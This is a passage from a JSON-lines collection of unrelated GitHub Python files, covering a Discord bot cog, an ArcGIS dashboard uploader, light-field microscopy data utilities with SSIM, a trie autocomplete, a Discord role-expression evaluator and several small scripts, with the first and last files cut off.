country\n\t\n\n\n\tdef __repr__(self): # representation, if I want to print object only, what do I print. Equivalent to print(object)\n\t\treturn '< University {} with id {} in country is created >'.format(self.name,self.id,self.country) # this will eventually be return to user when they post and this return statement is the result shown to them if the object is created successfully\n\n\tdef serialize(self): # this must be in JSON format, which in python terms list/dict. convert single row in DB to a json object to user\n\t\treturn{\n\t\t\t'id':self.id,\n\t\t\t'name':self.name,\n\t\t\t'country':self.country,\n\t\t\t'grp_url':[] if self.grp_url is None else self.grp_url\n\t\t}\n\t# dict in python is unordered, so the result may not follow this particular sequence\n\n\n\n","repo_name":"wanning-lee-2018/SMT203Proj-preliminary-version-","sub_path":"proj_flask/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74703986681","text":"from discord.ext import commands\nfrom botSettings import settings\nimport logging\n\nfrom handlers import db_handler as mongo\nfrom handlers import cache\nfrom handlers import jobsQueue as queue\nimport shortuuid\n\n\n\n\n# Discord Bot cog\n\nclass Dev(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.db = mongo.Dbhandler()\n self.logger = logging.getLogger(__name__)\n self.logger.info('Init cmdDevTest COG')\n self.cache = cache.MyCacheLayer(self.bot)\n self.queue = queue.jobsQueue()\n self.settings = settings\n \n\n @commands.command(aliases=['Development'],pass_context=True, name='dev')\n async def dev(self, ctx):\n await ctx.message.add_reaction(\"⏳\")\n self.uid = shortuuid.uuid()\n self.allycodes = [376764962, 146197219, 631896435]\n if self.settings.SHITTYBOT_REQUESTS < 3:\n self.queue.add_request(self.uid)\n self.pos = self.queue.get_qposition(self.uid)\n self.msg1 = await ctx.send(f'Várakozó kérések száma: {self.pos}')\n\n #self.player_data = self.cache.get_chached(self.allycode)\n #if self.player_data is None:\n self.player_data = await self.cache.get_allycode(self.allycodes)\n # else:\n # print('Player data was chached')\n\n await ctx.send('Played data ready')\n\n else:\n self.msg1 = await ctx.send(f'Várakozó kérések száma több mint 3: {self.pos}')\n \n\n\n \n\n\n\n @dev.error\n async def josoultsag_hiba(self, ctx, error):\n self.ctx = ctx\n if isinstance(error, commands.CheckFailure):\n print(\"Permission error!!!\")\n await self.ctx.send('⛔ - Nincsen hozzá jogosultságod!')\n else:\n await self.ctx.send('⛔ - Szar van a palacsintában, próbáld újra \\n')\n\n\n\n\n\n\n\n\n# ---------------------------------------------\ndef setup(bot):\n bot.add_cog(Dev(bot))","repo_name":"deesnow/SnakeBot","sub_path":"expansions/cmdDev.py","file_name":"cmdDev.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74623928120","text":"import sys\nimport torch\nimport datasets\nimport csv\nfrom utils import Cubert_Model, DEVICE, MAX_LEN\nfrom utils import get_dataloader_input, get_dataloader\nfrom utils import eval_fn, all_metrics_scores\n\n# evaluation\nspan_model = Cubert_Model()\nspan_model.to(DEVICE)\nspan_model.load_state_dict(torch.load(\"finetuned_ckpts/Cubert-1K\", map_location=DEVICE))\n\ndef get_EM(examples_data, model=span_model):\n assert len(examples_data) == 1\n (model_input_ids, model_segment_ids,\n model_input_mask, model_labels_ids) = get_dataloader_input(examples_data,\n example_types_to_evaluate=\"all\",\n setting='ideal',\n vocab_file=\"pretrained_model_configs/vocab.txt\")\n target_sequences = model_labels_ids\n eval_data_loader, eval_file_length = get_dataloader(\n model_input_ids,\n model_input_mask,\n model_segment_ids,\n model_labels_ids\n )\n\n\n pruned_target_sequences, output_sequences, _ = eval_fn(\n eval_data_loader, model, DEVICE)\n\n pruned_target_sequences = pruned_target_sequences.tolist()\n output_sequences = output_sequences.tolist()\n\n metrics = all_metrics_scores(True, target_sequences,\n pruned_target_sequences, output_sequences)\n return metrics['exact_match']","repo_name":"thepurpleowl/nips-gpt","sub_path":"cubert_spanprediction.py","file_name":"cubert_spanprediction.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30519888130","text":"import os\nimport json\nimport arcgis\nfrom arcgis.gis import GIS\nimport arcgis.features\nimport pandas as pd\nfrom arcgis.features import FeatureLayerCollection\n\ndef main():\n\tprint(\"Starting upload\")\n\tgis = GIS(\"home\")\n\n\tprint(\"Violence Dashboard\")\n\tfeature_layer_item = gis.content.search(\"025115e9685b4cc6ae886d72864dc001\")[0]\n\tprint(feature_layer_item)\n\tflayers = feature_layer_item.tables\n\tflayer = flayers[0]\n\tflayer.manager.truncate()\n\tdata_file_location = r'C:\\Users\\hchapman\\OneDrive - Jackson County Missouri\\Documents\\Dashboards\\Violence Dashboard - v2.0\\CombinedShootingDataV2.csv'\n\tflayerNew = FeatureLayerCollection.fromitem(feature_layer_item)\n\tflayerNew.manager.overwrite(data_file_location)\n\n\tprint(\"Violence Dashboard - Map\")\n\tfeature_layer_item = gis.content.search(\"786f36a3059d4129b7778d6646966905\")[0]\n\tprint(feature_layer_item)\n\tflayers = feature_layer_item.layers\n\tflayer = flayers[0]\n\tflayer.manager.truncate()\n\tdata_file_location = r'C:\\Users\\hchapman\\OneDrive - Jackson County Missouri\\Documents\\Dashboards\\Violence Dashboard - v2.0\\ShootingMapV2.csv'\n\tflayerNew = FeatureLayerCollection.fromitem(feature_layer_item)\n\tflayerNew.manager.overwrite(data_file_location)\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"HenryFChapman/ViolenceDashboard","sub_path":"DataUploader.py","file_name":"DataUploader.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15556158033","text":"from images import Images\nfrom databases import Databases\nfrom PIL import Image\n\n\ndef main():\n command = input(\"Please select an image number(1 or 2):\")\n if command == \"1\":\n while True:\n image_1 = Images(\"image_1.png\", \"RGB\", 500, 500, \"white\")\n try:\n image_1.draw_on_image_version_1(database, 500, 500)\n except RuntimeError:\n continue\n else:\n image_1.save_image()\n img = Image.open('image_1.png')\n img.show()\n break\n elif command == \"2\":\n while True:\n image_2 = Images(\"image_2.png\", \"RGB\", 500, 500, \"black\")\n try:\n image_2.draw_on_image_version_2(database, 500, 500)\n except RuntimeError:\n continue\n else:\n image_2.save_image()\n img = Image.open('image_2.png')\n img.show()\n break\n else:\n print(\"Not a valid number\")\n\n\ndatabase = Databases(\"admin_data.csv\", \"base_data.sql\")\ntry:\n database.connect_db()\nexcept ConnectionError:\n print(\"Uh oh, can't connect. Invalid dbname, user or password?\")\nelse:\n main()\n","repo_name":"CodecoolBP20161/python-data-visualisation-empty_and_the","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1480084589","text":"# http://www.pythonchallenge.com/pc/def/channel.html\n\nimport zipfile, re\n\n\n\n\nf = zipfile.ZipFile(\"channel.zip\")\nprint(f.comment.decode(\"utf-8\"))\nnum = '90052'\nwhile True:\n content = f.read(num + \".txt\").decode(\"utf-8\")\n print(f.getinfo(num + \".txt\").comment.decode(\"utf-8\"),end='')\n #print(content)\n match = re.search(\"Next nothing is (\\d+)\", content)\n if match == None:\n break\n num = match.group(1)\n\n\n # HOCKEY\n","repo_name":"eriksylvan/PythonChallange","sub_path":"6/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73965208760","text":"class TrieNode:\n def __init__(self):\n self.children = defaultdict(TrieNode)\n self.count = defaultdict(int)\n\nclass AutocompleteSystem:\n\n def __init__(self, sentences: List[str], times: List[int]):\n self.root = TrieNode()\n self.current_search_term = ''\n self.curr_root = self.root\n for i, sentence in enumerate(sentences):\n self.add(sentence, times[i])\n \n def add(self, sentence, count):\n curr = self.root\n for char in sentence:\n curr = curr.children[char] # 1. \n curr.count[sentence] += count # 2.\n \n def input(self, c: str) -> List[str]:\n search_results = []\n heap = []\n k = 3\n if c == '#':\n self.add(self.current_search_term, 1)\n self.current_search_term = ''\n self.curr_root = self.root\n return []\n self.current_search_term += c\n self.curr_root = self.curr_root.children[c]\n for sentence, count in self.curr_root.count.items():\n heappush(heap, (-count, sentence))\n while heap and k:\n count, sentence = heappop(heap)\n search_results.append(sentence)\n k -= 1\n return search_results\n\n'''\n1. Assigns the current char as the child of the current object.\n2. Increment the count on the children and not on the current node.\n'''\n","repo_name":"csusb-005411285/CodeBreakersCode","sub_path":"design-search-autocomplete-system.py","file_name":"design-search-autocomplete-system.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"3736018272","text":"import tables\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils import data\nfrom torch.autograd import Variable\nimport torchvision as tv\nimport random\nimport h5py\nfrom math import exp\nimport os\nimport sys\nclass Dataset(object):\n def __init__(self, fname, randomSeed=None, img_indices=None, fov=None, \\\n neighShape=1, keep_imgs=False, random_imgs=False, center_region=None, get_full_imgs=False):\n self.fname = fname\n self.tables = tables.open_file(self.fname, \"r\")#, driver=\"H5FD_CORE\")\n self.neighShape = neighShape\n self.LFShape = self.tables.root.LFData.shape\n self.volShape = self.tables.root.volData.shape\n self.tilesPerImage = self.LFShape[2:4]\n self.keep_imgs = keep_imgs\n self.nPatchesPerImg = self.tilesPerImage[0]*self.tilesPerImage[1]\n self.randomSeed = randomSeed\n self.nImagesInDB = self.LFShape[-1]\n self.getFullImgs = get_full_imgs\n self.fov = fov\n self.nDepths = self.volShape[2]\n if randomSeed is not None:\n torch.manual_seed(randomSeed)\n if fov is None:\n fov = 9\n self.centerRegion = center_region\n\n # Defines ranges to use accross each dimension\n LF_ix_y = list(range(0,self.LFShape[2]))\n LF_ix_x = list(range(0,self.LFShape[3]))\n vol_ix_y = list(range(0,self.volShape[0]))\n vol_ix_x = list(range(0,self.volShape[1]))\n\n # If a center region of the images is desired, crop\n if center_region is not None:\n LF_ix_y = list(range(self.LFShape[2]//2-center_region//2,self.LFShape[2]//2+center_region//2))\n LF_ix_x = list(range(self.LFShape[3]//2-center_region//2,self.LFShape[3]//2+center_region//2))\n vol_ix_y = list(range(self.volShape[0]//2-(center_region*self.LFShape[0])//2,self.volShape[0]//2+(center_region*self.LFShape[0])//2))\n vol_ix_x = list(range(self.volShape[1]//2-(center_region*self.LFShape[1])//2,self.volShape[1]//2+(center_region*self.LFShape[1])//2))\n self.tilesPerImage = [center_region, center_region]\n self.nPatchesPerImg = self.tilesPerImage[0]*self.tilesPerImage[1]\n self.LFShape = tuple([self.LFShape[0],self.LFShape[1],center_region, center_region,self.LFShape[-1]])\n self.volShape = tuple([self.LFShape[0]*center_region, self.LFShape[1]*center_region, self.volShape[-2], self.volShape[-1]])\n\n self.LFSideLenght = fov + neighShape - 1\n self.VolSideLength = self.neighShape * self.LFShape[0]\n\n # Use images either suggested by user or all images\n if img_indices is None:\n self.img_indices = range(0,self.nImagesInDB)\n else:\n self.img_indices = img_indices\n \n # Randomize images\n if random_imgs:\n self.img_indices = torch.randperm(int(self.nImagesInDB))\n\n self.nImagesToUse = len(self.img_indices)\n\n self.nPatches = self.nPatchesPerImg * (self.nImagesToUse)\n\n # Compute padding\n fov_half = self.fov//2\n if self.getFullImgs:\n neighShapeHalf = self.neighShape//2\n startOffset = fov_half\n paddedLFSize = self.LFShape[:2] + tuple([self.LFShape[2]+2*startOffset,self.LFShape[3]+2*startOffset])\n paddedVolSize = self.volShape[0:3]\n else:\n neighShapeHalf = self.neighShape//2\n startOffset = fov_half + neighShapeHalf\n paddedLFSize = self.LFShape[:2] + tuple([self.LFShape[2]+2*startOffset,self.LFShape[3]+2*startOffset])\n paddedVolSize = tuple([self.volShape[0]+2*neighShapeHalf*self.LFShape[0],self.volShape[1]+2*neighShapeHalf*self.LFShape[1],self.volShape[2]])\n \n self.LFFull = torch.zeros(paddedLFSize+tuple([self.nImagesToUse]),dtype=torch.uint8)\n self.VolFull = torch.zeros(paddedVolSize+tuple([self.nImagesToUse]),dtype=torch.uint8)\n\n \n print(\"Loading img: \",end=' ')\n for nImg,imgIx in enumerate(self.img_indices):\n print(str(imgIx),end=' ')\n # Load data from database\n currLF = torch.tensor(self.tables.root.LFData[:,:,:,:,imgIx], dtype=torch.uint8)\n currVol = torch.tensor(self.tables.root.volData[:,:,:,imgIx], dtype=torch.uint8)\n currLF = currLF[:,:,LF_ix_y,:]\n currLF = currLF[:,:,:,LF_ix_x]\n currVol = currVol[vol_ix_y,:,:]\n currVol = currVol[:,vol_ix_x,:]\n # Pad with zeros borders\n currLF = F.pad(currLF, (startOffset, startOffset, startOffset, startOffset, 0, 0, 0, 0))\n if self.getFullImgs==False:\n currVol = F.pad(currVol, (0,0,neighShapeHalf*self.LFShape[1],neighShapeHalf*self.LFShape[1],\\\n neighShapeHalf*self.LFShape[0],neighShapeHalf*self.LFShape[0]))\n self.LFFull[:,:,:,:,nImg] = currLF\n self.VolFull[:,:,:,nImg] = currVol\n \n self.volMax = self.VolFull.max()\n self.LFMax = self.LFFull.max()\n self.VolDims = [neighShape*self.LFShape[0],neighShape*self.LFShape[1],self.volShape[2]]\n self.LFDims = [self.LFShape[0],self.LFShape[1],self.LFSideLenght,self.LFSideLenght]\n\n if self.getFullImgs:\n self.VolDims = self.volShape[0:3]\n self.LFDims = self.LFShape[0:4]\n self.nPatches = len(self.img_indices)\n self.tables.close()\n\n def __getitem__(self, index):\n # Fetch full image or patches\n if self.getFullImgs:\n currLFPatch = self.LFFull[:,:,:,:, index].unsqueeze(0)\n currVolPatch = self.VolFull[:,:,:, index].unsqueeze(0)\n else:\n nImg = index//self.nPatchesPerImg\n nPatch = index - nImg*self.nPatchesPerImg\n yLF = nPatch//self.LFShape[3]\n xLF = nPatch%self.LFShape[3]\n yVol = yLF*self.LFShape[0]\n xVol = xLF*self.LFShape[1]\n\n # Crop current patch\n currLFPatch = self.LFFull[:,:,yLF:yLF+self.LFSideLenght, xLF:xLF+self.LFSideLenght, nImg].unsqueeze(0)\n currVolPatch = self.VolFull[yVol:yVol+self.VolSideLength, xVol:xVol+self.VolSideLength,:, nImg].unsqueeze(0)\n \n return currLFPatch, currVolPatch\n\n def __len__(self):\n return self.nPatches\n\n def get_n_depths(self):\n return self.VolDims[-1]\n def get_max(self):\n return self.LFMax, self.volMax\n def __shape__(self):\n return self.VolDims, self.LFDims\n \ndef convert3Dto2DTiles(x, lateralTile):\n nDepths = x.shape[-1]\n volSides = x.shape[-3:-1]\n nChans = x.shape[1]\n verticalTile = x.permute(0, 1, 4, 2, 3).contiguous().view(-1, nChans, volSides[0]*nDepths, volSides[1])\n currPred = verticalTile[:,:,0:volSides[0]*lateralTile[0],:]\n for k in range(1,lateralTile[1]):\n currPred = torch.cat((currPred, verticalTile[:,:,(lateralTile[0]*volSides[0]*k):(lateralTile[0]*volSides[0]*(k+1)),:]), dim=3)\n return currPred\n\ndef convert4Dto3DTiles(x, lateralTile):\n nDepths = x.shape[-1]\n volSide = x.shape[-2]\n nSamples = x.shape[0]\n verticalTile = x.permute(1,0,2,3).contiguous().view(volSide,volSide*nSamples,nDepths)\n currPred = verticalTile[:,0:volSide*lateralTile[0],:]\n for k in range(1,lateralTile[1]):\n currPred = torch.cat((currPred, verticalTile[:,(lateralTile[0]*volSide*k):(lateralTile[0]*volSide*(k+1)),:]), dim=0)\n return currPred\n\ndef LF2Spatial(xIn, LFSize):\n xShape = xIn.shape\n x = xIn\n if xIn.ndimension() == 6:\n x = xIn.permute((0,1,4,2,5,3)).contiguous().view(xShape[0], xShape[1], LFSize[0] * LFSize[2], LFSize[1] * LFSize[3])\n if xIn.ndimension() == 4:\n x = xIn.view(xShape[0],xShape[1],LFSize[2],LFSize[0],LFSize[3],LFSize[1]).permute((0,1,3,5,2,4)).contiguous()\n return x\n\ndef LF2Angular(xIn, LFSize):\n xShape = xIn.shape\n x = xIn\n if xIn.ndimension() == 6:\n x = xIn.permute((0,1,2,4,3,5)).contiguous().view(xShape[0], xShape[1], LFSize[0] * LFSize[2], LFSize[1] * LFSize[3])\n if xIn.ndimension() == 4:\n x = xIn.view(xShape[0],xShape[1],LFSize[0],LFSize[2],LFSize[1],LFSize[3]).permute((0,1,2,4,3,5)).contiguous()\n return x\n\ndef weights_init(m):\n if isinstance(m, nn.Conv2d):\n nn.init.constant_(m.weight.data, 1/len(m.weight.data))\n if isinstance(m, nn.ConvTranspose2d):\n nn.init.constant_(m.weight.data, 1/len(m.weight.data))\n\ndef getThreads():\n if sys.platform == 'win32':\n return (int)(os.environ['NUMBER_OF_PROCESSORS'])\n else:\n return (int)(os.popen('grep -c cores /proc/cpuinfo').read())\n\ndef str2bool(v):\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\n\ndef imadjust(x,a,b,c,d,gamma=1):\n # Similar to imadjust in MATLAB.\n # Converts an image range from [a,b] to [c,d].\n # The Equation of a line can be used for this transformation:\n # y=((d-c)/(b-a))*(x-a)+c\n # However, it is better to use a more generalized equation:\n # y=((x-a)/(b-a))^gamma*(d-c)+c\n # If gamma is equal to 1, then the line equation is used.\n # When gamma is not equal to 1, then the transformation is not linear.\n\n y = (((x - a) / (b - a)) ** gamma) * (d - c) + c\n mask = (y>0).float()\n y = torch.mul(y,mask)\n return y\n\n\n\n\n######## SSIM\n\ndef gaussian(window_size, sigma):\n gauss = torch.Tensor([exp(-(x - window_size//2)**2/float(2*sigma**2)) for x in range(window_size)])\n return gauss/gauss.sum()\n\ndef create_window(window_size, channel):\n _1D_window = gaussian(window_size, 1.5).unsqueeze(1)\n _2D_window = _1D_window.mm(_1D_window.t()).float().unsqueeze(0).unsqueeze(0)\n window = Variable(_2D_window.expand(channel, 1, window_size, window_size).contiguous())\n return window\n\ndef _ssim(img1, img2, window, window_size, channel, size_average = True):\n mu1 = F.conv2d(img1, window, padding = window_size//2, groups = channel)\n mu2 = F.conv2d(img2, window, padding = window_size//2, groups = channel)\n\n mu1_sq = mu1.pow(2)\n mu2_sq = mu2.pow(2)\n mu1_mu2 = mu1*mu2\n\n sigma1_sq = F.conv2d(img1*img1, window, padding = window_size//2, groups = channel) - mu1_sq\n sigma2_sq = F.conv2d(img2*img2, window, padding = window_size//2, groups = channel) - mu2_sq\n sigma12 = F.conv2d(img1*img2, window, padding = window_size//2, groups = channel) - mu1_mu2\n\n C1 = 0.01**2\n C2 = 0.03**2\n\n ssim_map = ((2*mu1_mu2 + C1)*(2*sigma12 + C2))/((mu1_sq + mu2_sq + C1)*(sigma1_sq + sigma2_sq + C2))\n\n if size_average:\n return ssim_map.mean()\n else:\n return ssim_map.mean(1).mean(1).mean(1)\n\nclass SSIM(torch.nn.Module):\n def __init__(self, window_size = 11, size_average = True):\n super(SSIM, self).__init__()\n self.window_size = window_size\n self.size_average = size_average\n self.channel = 1\n self.window = create_window(window_size, self.channel)\n\n def forward(self, img1, img2):\n (_, channel, _, _) = img1.size()\n\n if channel == self.channel and self.window.data.type() == img1.data.type():\n window = self.window\n else:\n window = create_window(self.window_size, channel)\n \n if img1.is_cuda:\n window = window.cuda(img1.get_device())\n window = window.type_as(img1)\n \n self.window = window\n self.channel = channel\n\n\n return _ssim(img1, img2, window, self.window_size, channel, self.size_average)\n\ndef ssim(img1, img2, window_size = 11, size_average = True):\n (_, channel, _, _) = img1.size()\n window = create_window(window_size, channel)\n \n if img1.is_cuda:\n window = window.cuda(img1.get_device())\n window = window.type_as(img1)\n \n return _ssim(img1, img2, window, window_size, channel, size_average)","repo_name":"pvjosue/LFMNet","sub_path":"util/LFUtil.py","file_name":"LFUtil.py","file_ext":"py","file_size_in_byte":12010,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"40"} +{"seq_id":"73967354361","text":"# Bruce A. Maxwell\n# June 2023\n# Converts one or more crt or dng images to 16-bit TIFFs scaled [0, 65535]\n#\nimport sys\nimport imageio\nimport raw_utility as rtl\n\ndef main(argv):\n\n if len(argv) < 2:\n print(\"usage: python %s \" % (argv[0]) )\n return\n\n for filename in argv[1:]:\n suffix = filename.split(\".\")[-1].lower()\n if suffix != 'dng' and suffix != 'cr2':\n print(\"Input image %s is not a supported raw image file\")\n return\n\n print(\"Processing %s\" % (filename) )\n rgb, logrgb = rtl.processRAW( filename )\n\n # save as a 16-bit TIFF\n words = filename.split(\".\")\n newfilename = words[0] + \".tif\"\n\n print(\"Writing %s\" % (newfilename) )\n imageio.imsave( newfilename, rgb )\n\n print(\"Terminating\")\n\n return\n\nif __name__ == \"__main__\":\n main(sys.argv)\n\n","repo_name":"rodroadl/LogSpaceExploration","sub_path":"misc/utils/raw2tif.py","file_name":"raw2tif.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71215353081","text":"from src.modules.get_schedule.app.get_schedule_usecase import GetScheduleUsecase\nfrom src.shared.infra.repositories.answer_repository_mock import AnswerRepositoryMock\n\n\nclass Test_GetScheduleUsecase:\n def test_get_schedule_usecase(self):\n repo = AnswerRepositoryMock()\n usecase = GetScheduleUsecase(repo)\n \n schedule = usecase()\n \n assert schedule.url == 'https://www.google.com'\n ","repo_name":"Lucasdvs10/Projeto-Integrador-2023.2","sub_path":"tests/modules/get_schedule/app/test_get_schedule_usecase.py","file_name":"test_get_schedule_usecase.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71826235960","text":"from threading import Thread, current_thread, Lock\n\nnum = 0\nlock = Lock()\n\n\ndef calc():\n print('child thread %s start' % current_thread().name)\n global num\n for _ in range(10000):\n # 获取锁\n lock.acquire()\n num += 1\n # 释放锁\n lock.release()\n print('child thread %s end' % current_thread().name)\n\n\nif __name__ == '__main__':\n print('parent thread %s start' % current_thread().name)\n threads = []\n for i in range(5):\n threads.append(Thread(target=calc()))\n threads[i].start()\n for i in range(5):\n threads[i].join()\n print('global num:', num)\n print('parent thread %s end' % current_thread().name)\n","repo_name":"xtawfnhdx/PythonBaseStudy","sub_path":"08 进程线程和协程/082线程2.py","file_name":"082线程2.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38199932277","text":"from .geometry import *\n\nclass Mesh:\n \"\"\"This is a 1D mesh analogous to a more conventional 2D or 3D mesh.\n \"\"\"\n\n def __init__(self, p0, p1, nSamples):\n self.p0 = p0\n self.p1 = p1\n d = 1 / (nSamples - 1) # spacing between vertices\n self.samplePoints = []\n for i in range(nSamples):\n t = i * d\n p = self.p0 + t * (self.p1 - self.p0)\n self.samplePoints.append(p)\n\n def line(self):\n \"\"\"returns the line the wall intersects\n\n it returns (p0, n) where p0 is an arbitrary point on the line and n is\n a normal to the the line, which is defined by n . (p - p0) = 0 for any\n point p on the line.\n \"\"\"\n return lineThroughPoints(self.p0, self.p1)\n\n def intersectsRay(self, ray):\n \"\"\"returns true iff ray intersects the wall\n \"\"\"\n return ray.intersectsLineSegment(self.p0, self.p1)\n","repo_name":"EllenAPorter/ExScRaTr","sub_path":"src/lmprop/lmprop/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14018812183","text":"import enum\nimport itertools\nfrom collections import deque\n\n\nclass TokenType(enum.Enum):\n \"\"\"Expression token type enum\"\"\"\n\n SYMBOL = 0\n LOGIC_AND = 1\n LOGIC_OR = 2\n LOGIC_NOT = 3\n L_PARANTHESIS = 4\n R_PARANTHESIS = 5\n\n\n#: Expression token dictionary to simplify code a bit\nTokenDic = {\n \"&\": TokenType.LOGIC_AND,\n \"|\": TokenType.LOGIC_OR,\n \"!\": TokenType.LOGIC_NOT,\n \"(\": TokenType.L_PARANTHESIS,\n}\n\n\n#: Precedence value dictionary for postfix conversion\nPrecedence = {\n TokenType.LOGIC_NOT: 20,\n TokenType.LOGIC_AND: 11,\n TokenType.LOGIC_OR: 10,\n TokenType.SYMBOL: 0,\n TokenType.L_PARANTHESIS: 0,\n TokenType.R_PARANTHESIS: 0,\n}\n\n\nclass ExpressionToken:\n \"\"\"Expression token representation\"\"\"\n\n type = -1\n value = \"\"\n\n def __init__(self, type, value):\n self.type = type\n self.value = value\n\n\nclass MetaRoleEvaluator:\n #: Dictionary for symbol evaluation\n dictionary = {}\n\n def __init__(self, role_dict: dict):\n self.dictionary = role_dict\n\n def tokenize(self, in_str):\n \"\"\"Tokenize the input string\"\"\"\n tokens = []\n # Remove whitespace\n in_str = \"\".join(in_str.split())\n # If the first character is not a symbol name start or '!' or\n # '(' we have an invalid expression\n if not (in_str[0].isdigit() or in_str[0] == \"!\" or in_str[0] == \"(\"):\n raise Exception(\"Invalid syntax at 0\")\n i = 0\n while i < len(in_str):\n # Symbol name must start with a digit (Discord role ID)\n if in_str[i].isdigit():\n symbol = \"\".join(itertools.takewhile(lambda x: x.isdigit(), in_str[i:]))\n i += len(symbol) - 1\n tokens.append(ExpressionToken(TokenType.SYMBOL, symbol))\n elif (in_str[i] == \"&\" and in_str[i + 1] == \"&\") or (\n in_str[i] == \"|\" and in_str[i + 1] == \"|\"\n ):\n i += 1\n # If no next char or next char is r_paranthesis - invalid syntax\n if i + 1 >= len(in_str) or in_str[i + 1] == \")\":\n raise Exception(\"Invalid syntax at {}\".format(i))\n tokens.append(ExpressionToken(TokenDic[in_str[i]], 0))\n elif in_str[i] == \"!\" or in_str[i] == \"(\":\n # For unary operations and left paranthesis\n # if previous token is a symbol or r_paranthesis - invalid syntax\n if tokens and (\n tokens[-1].type == TokenType.SYMBOL\n or tokens[-1].type == TokenType.R_PARANTHESIS\n ):\n raise Exception(\"Invalid syntax at {}\".format(i))\n tokens.append(ExpressionToken(TokenDic[in_str[i]], 0))\n elif in_str[i] == \")\":\n # Empty paranthesis\n if tokens and tokens[-1].type == TokenType.L_PARANTHESIS:\n raise Exception(\"Invalid syntax at {}\".format(i))\n tokens.append(ExpressionToken(TokenType.R_PARANTHESIS, 0))\n else:\n raise Exception(\"Illegal token {} at {}\".format(in_str[i], i))\n i += 1\n return tokens\n\n def convert_to_postfix(self, tokens):\n \"\"\"Convert tokenized expression to postfix form\"\"\"\n stack = deque()\n output = []\n for token in tokens:\n if token.type == TokenType.LOGIC_AND or token.type == TokenType.LOGIC_OR:\n if stack:\n minPrecedence = Precedence[token.type]\n while Precedence[stack[-1].type] >= minPrecedence:\n output.append(stack.pop())\n if not stack:\n break\n stack.append(token)\n elif token.type == TokenType.SYMBOL:\n output.append(token)\n elif token.type == TokenType.LOGIC_NOT:\n stack.append(token)\n elif token.type == TokenType.L_PARANTHESIS:\n stack.append(token)\n elif token.type == TokenType.R_PARANTHESIS:\n if not stack:\n raise Exception(\"Missing parenthesis\")\n while stack[-1].type != TokenType.L_PARANTHESIS:\n output.append(stack.pop())\n if not stack:\n raise Exception(\"Missing parenthesis\")\n stack.pop()\n if not stack:\n return output\n if stack[-1].type == TokenType.L_PARANTHESIS:\n raise Exception(\"Missing parenthesis\")\n while stack:\n output.append(stack.pop())\n return output\n\n def evaluate_symbol(self, symbol):\n \"\"\"Evaluate the symbol\"\"\"\n if symbol not in self.dictionary:\n raise Exception(\"Symbol {} doesn't exist.\".format(symbol))\n return self.dictionary[symbol]\n\n def evaluate(self, in_str):\n \"\"\"Evaluate string expression\"\"\"\n if not in_str:\n raise Exception(\"Empty expression string\")\n tokens = self.convert_to_postfix(self.tokenize(in_str))\n stack = deque()\n result = False\n for token in tokens:\n if token.type == TokenType.LOGIC_NOT:\n rightOperand = stack.pop()\n result = not rightOperand\n stack.append(result)\n elif token.type == TokenType.LOGIC_AND:\n rightOperand = stack.pop()\n leftOperand = stack.pop()\n result = leftOperand and rightOperand\n stack.append(result)\n elif token.type == TokenType.LOGIC_OR:\n rightOperand = stack.pop()\n leftOperand = stack.pop()\n result = leftOperand or rightOperand\n stack.append(result)\n elif token.type == TokenType.SYMBOL:\n stack.append(self.evaluate_symbol(token.value))\n return stack.pop()\n","repo_name":"SciADV-Community/rosetta","sub_path":"src/rosetta/utils/role_expr.py","file_name":"role_expr.py","file_ext":"py","file_size_in_byte":5917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15915299927","text":"\r\n''' \r\nCount tax from input amount, interest and purpose.\r\n\r\nArgs: \r\n amount: amount of money to calculate tax\r\n interest: interest rate to be applied on amount\r\n purpose: purpose for which tax was applied\r\n\r\nReturn:\r\n 4 values: amount, interest, tax, purpose.\r\n\r\nRaises:\r\n \"TypeError for wrong arg types\r\n'''\r\n\r\ndef calculateTax(amount, interest, purpose) :\r\n if type(amount) != float : \r\n raise TypeError(\"Must be float or int\") \r\n if type(interest) != float : \r\n raise TypeError(\"Must be float or int\")\r\n \r\n tax = amount * (interest/100)\r\n result = { \r\n \"amount\" : amount, \r\n \"interest\": interest, \r\n \"tax\" : tax, \r\n \"purpose\" : purpose}\r\n return result\r\n \r\n\r\n# - used dict for better visibility and understanding of the values\r\n# - the posibility to use any key separatly and add more 